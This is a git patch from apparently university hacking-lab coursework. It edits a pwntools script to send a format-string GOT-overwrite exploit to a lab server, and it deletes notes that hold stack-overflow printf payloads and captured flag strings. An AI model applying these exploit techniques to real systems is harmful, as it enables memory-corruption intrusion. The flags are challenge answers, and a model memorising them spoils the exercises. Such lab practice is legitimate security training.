From e7a9ea4c8d04b7d4c55258dc41e3e72f1aed2bf5 Mon Sep 17 00:00:00 2001
From: Eggert Jung <eggert.s.jung@wischhof13.de>
Date: Mon, 2 Feb 2026 16:05:13 +0100
Subject: [PATCH] remote

---
 4/level10/test.py | 6 ++++--
 4/level11/test    | 7 -------
 2 files changed, 4 insertions(+), 9 deletions(-)
 delete mode 100644 4/level11/test

diff --git a/4/level10/test.py b/4/level10/test.py
index c608ca3..115e673 100644
--- a/4/level10/test.py
+++ b/4/level10/test.py
@@ -15,8 +15,10 @@ print("win     : ", hex(win_addr))
 
 #for i in range(1,30):
 #print("##################### ", i)
-p = process(elf.path)
-#p = remote("localhost", 4010)
+#p = process(elf.path)
+p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
+payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
+p.sendline(payload.encode())
 
 context.clear(arch = 'amd64')
 payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
diff --git a/4/level11/test b/4/level11/test
deleted file mode 100644
index 9517151..0000000
--- a/4/level11/test
+++ /dev/null
@@ -1,7 +0,0 @@
-last key
-32 byte filler
-overwrite rbp with sane address (doesnt need to be specific, just dont segfault bc of memory region)
-overwrite rip with address of win
-
-#printf 'hacklab{why_c4n7_y0u_ju57_d0_th3_m4th_eBPiC6YB}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt
-printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x56\x13\x40\00\00\00\00\00\ncat flag.txt\n'